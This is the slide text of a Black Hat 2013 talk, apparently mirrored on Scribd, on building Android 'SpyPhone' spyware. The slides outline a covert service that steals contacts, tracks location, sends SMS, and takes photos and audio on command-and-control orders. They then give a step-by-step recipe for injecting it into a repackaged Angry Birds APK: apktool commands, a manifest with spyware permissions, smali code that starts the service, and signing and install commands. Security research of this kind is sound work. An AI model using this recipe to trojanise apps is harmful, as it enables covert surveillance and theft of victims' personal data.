Scribd Logo
Upload

Welcome to Scribd!

  • 3K views

    How To Build A SpyPhone (Presentation Slides)

    Uploaded by

    LeakSourceInfo
    http://leaksource.wordpress.com/2013/12/31/kevin-mcnamee-how-to-build-a-spyphone-blackhat-2013/ https://twitter.com/LeakSourceNews

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd

    How To Build A SpyPhone (Presentation Slides)

    Uploaded by

    LeakSourceInfo
    3K views30 pages
    http://leaksource.wordpress.com/2013/12/31/kevin-mcnamee-how-to-build-a-spyphone-blackhat-2013/ https://twitter.com/LeakSourceNews

    Original Title

    How to Build a SpyPhone (Presentation Slides)

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    http://leaksource.wordpress.com/2013/12/31/kevin-mcnamee-how-to-build-a-spyphone-blackhat-2013/ https://twitter.com/LeakSourceNews

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    3K views30 pages

    How To Build A SpyPhone (Presentation Slides)

    Uploaded by

    LeakSourceInfo
    http://leaksource.wordpress.com/2013/12/31/kevin-mcnamee-how-to-build-a-spyphone-blackhat-2013/ https://twitter.com/LeakSourceNews

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    You are on page 1of 30
    At a glance
    Powered by AI
    The key takeaways are that smartphones can be turned into surveillance tools to track users' locations, steal personal information, intercept communications, and more without the users' knowledge if a rogue application is installed. The presentation demonstrates how to build an Android 'SpyPhone' service and inject it into another legitimate application to perform these malicious activities covertly.

    The SpyPhone service is implemented as an Android service that runs in the background even when the host application is closed. It collects information like contacts, location, and sends this data back to the attacker's command and control server over HTTP. It can also receive commands from the server to take actions like displaying messages, sending SMS, taking photos, and recording audio on the device.

    The main steps involved are: using apktool to extract the target application, copying the SpyPhone service code into it, updating the manifest to include the new service and required permissions, locating the main activity's onCreate method and starting the service from there, rebuilding the application package, signing it and optimizing the final apk.

    How to Build a SpyPhone

    Black Hat 2013 Kevin McNamee Alcatel-Lucent

    Agenda
    Introduction Demo of SpyPhone in Action SpyPhone Design Injecting SpyPhone Service into an App Conclusion & Questions

    SpyPhone - Then

    SpyPhone - Now

    Surveillance Then

    Surveillance - Now

    Internet

    Counter Measures Then

    Counter Measures - Now

    Internet

    Smart Phone Has Access To


    GPS Location Internet (from almost anywhere) A Microphone A Camera Local Wifi Networks E-Mail Text Messages Phone Calls Contact List Personal Information

    Smart Phone Is
    A perfect cyber-espionage tool that can be used to track the victims location, download personal information, intercept and send messages, record their conversations and take pictures without them knowing. In the context of BYOD and APT, it makes a perfect platform for launching inside attacks on corporate or government networks.

    10

    Demo
    Built an Android SpyPhone Service that can:
    Steal phone and contact information Report on location Execute commands from C&C server
    Display message on phone Send SMS to contacts Take pictures and sent to C&C Record sound and sent to C&C

    SpyPhone Service is:


    Injected into legitimate version of Angry Birds Distributed from fake app store Installation of infected application Sending information to C&C Locating the device Sending SMS Taking pictures Recording sound
    C&C Server

    Demo Shows

    C&C Protocol

    11

    SpyPhone Design
    Implemented as Android Service
    Self contained component Runs in background even when app is stopped. Starts at boot up Easy to inject into legitimate applications

    Command & Control


    HTTP to NodeJS Web Server update: send information to server toast: display message on screen shutdown: stop the bot sms: send SMS message to contacts location: send location information to server peep: take picture and send to server listen: record sound and send to server

    21

    Uses Standard Android APIs


    User Information
    import android.accounts.Account; import android.accounts.AccountManager; import android.telephony.SmsManager; import android.telephony.TelephonyManager; import android.location.Location; import android.location.LocationListener; import android.location.LocationManager; Import android.media.MediaRecording

    Camera
    import android.hardware.Camera; import android.hardware.Camera.PictureCallback; import android.hardware.Camera.PreviewCallback; import android.hardware.Camera.Size; import android.media.AudioManager; import android.view.SurfaceHolder; import android.view.SurfaceView; import org.apache.http.HttpResponse; import org.apache.http.NameValuePair; import org.apache.http.client.ClientProtocolException; import org.apache.http.client.HttpClient;

    Phone & SMS


    Location

    Web C&C

    Recording

    23

    Injection Process
    1. Use apktool to extract the components from the target app (in this case Angry Birds 2000).
    apktool d AngryBirds.apk

    24

    Injection Process
    2. Copy the smali code for the service to be injected into the smali directory structure. In our case it was in the directory example/android/droidwhisper.

    25

    Injection Process
    3. Update the manifest to include the injected service and the permissions required by the injected service. The updated manifest in the case of Angry Birds is shown below: Remember the app name for later Define the Droidwhisperer service Define required permissions
    <?xml version="1.0" encoding="utf-8"?> <manifest android:versionCode="2000" android:versionName="2.0.0" android:installLocation="auto" package="com.rovio.angrybirds" xmlns:android="http://schemas.android.com/apk/res/android"> <application android:label="@string/app_name" android:icon="@drawable/icon" android:debuggable="false"> <activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:name="com.rovio.ka3d.App" android:launchMode="singleTask" android:screenOrientation="landscape" android:configChanges="keyboardHidden|orientation"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> . . .(some lines missing). . . <service android:name="com.example.android.droidwhisper.DictionarySvc"> <intent-filter> <action android:name="com.rovio.ka3d.service.DICTIONARY_SERVICE" /> </intent-filter> </service> </application> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /> <uses-permission android:name="android.permission.READ_PHONE_STATE /> <uses-permission android:name="android.permission.READ_CONTACTS /> <uses-permission android:name="android.permission.GET_ACCOUNTS /> <uses-permission android:name="android.permission.SEND_SMS /> <uses-permission android:name="android.permission.INTERNET /> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION /> <uses-permission android:name="android.permission.CAMERA"/> <uses-feature android:name="android.hardware.camera"/> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission.RECORD_AUDIO"/> <uses-sdk android:minSdkVersion="4" android:targetSdkVersion="13" /> </manifest>

    26

    Injection Process
    4. Locate the onCreate function in the main activity of the target app. This can be found by looking in the manifest. In the case of Angry Birds this was com/rovio/ka3d/App, highlighted in the manifest file above. Add the following smali code just after the involk-super call to onCreate.
    new-instance v0, Landroid/content/Intent; invoke-direct {v0}, Landroid/content/Intent;-><init>()V .local v0, dictionaryIntent:Landroid/content/Intent; const-string v1, "com.rovio.ka3d.service.DICTIONARY_SERVICE" invoke-virtual {v0, v1}, Landroid/content/Intent;->setAction(Ljava/lang/String;)Landroid/content/Intent; invoke-virtual {p0, v0}, Landroid/app/Activity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;

    27

    Injection Process
    5. Rebuild the apk file using apktool.

    apktool b AngryBirds birds.apk


    6. Sign the APK file. (Any old certificate will do!) jarsigner -verbose -keystore C:\kevin\keys birds.apk alias_name

    You can verify the cert with jarsigner -verify -verbose -certs birds.apk
    7. Optimize the APK file. zipalign -v 4 birds.apk birds1.apk 8. Install and test the new application. The logcat command can be used in the adb shell to check for errors. adb install birds1.apk

    28

    SpyPhone Market

    29

    Next...

    Questions?
    30

    You might also like